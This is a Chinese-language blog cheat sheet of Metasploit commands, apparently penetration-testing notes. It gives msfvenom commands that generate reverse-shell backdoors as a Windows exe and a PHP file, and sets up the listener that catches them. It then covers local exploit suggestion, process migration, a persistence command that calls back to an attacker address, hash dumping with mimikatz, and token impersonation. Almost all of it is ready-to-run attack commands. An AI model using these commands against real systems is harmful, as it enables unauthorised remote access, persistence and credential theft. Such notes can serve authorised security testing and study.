zoukankan      html  css  js  c++  java
  • Metasploit笔记

    生成exe后门

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe

    生成PHP后门

    msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php

    使用监听模块(默认)

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    搜寻存在漏洞模块

    post/multi/recon/local_exploit_suggester

    迁移进程

    migrate pid

    权限维持 -Persistence

    run persistence -U -i 10 -p 4444 -r 192.168.61.3

    抓取Hash

    run hashdump

    load mimikatz

    令牌伪装

    list_tokens-u

    如果查看失败先用

    use incognito 或者 load incognito

    进入该模块 再使用

    impersonate_token 用户名

    基本操作命令

    ls:列出当前路径下的所有文件和文件夹。

    pwd 或 getwd:查看当前路径。

    search:搜索文件,使用 search -h 查看帮助。

    cat:查看文件内容,比如 cat test.txt

    edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。

    rm:删除文件。

    cd:切换路径。

    mkdir:创建文件夹。

    rmdir:删除文件夹。

    getlwd 或 lpwd:查看自己系统的当前路径。

    lcd:切换自己当前系统的目录。

    lls:显示自己当前系统的所有文件和文件夹。

    upload: upload 本地文件路径目标文件路径.

    download: download 目标文件路径 本地文件路径

  • 相关阅读:
    RedissonConfProperty
    IdGenerator(雪花)
    Btrace和arthas地址
    SqlFilter
    AuthorityFilter
    111
    分布式数据库-杂记
    站点集群
    分布式精华文章
    高并发
  • 原文地址:https://www.cnblogs.com/M0rta1s/p/11707871.html
Copyright © 2011-2022 走看看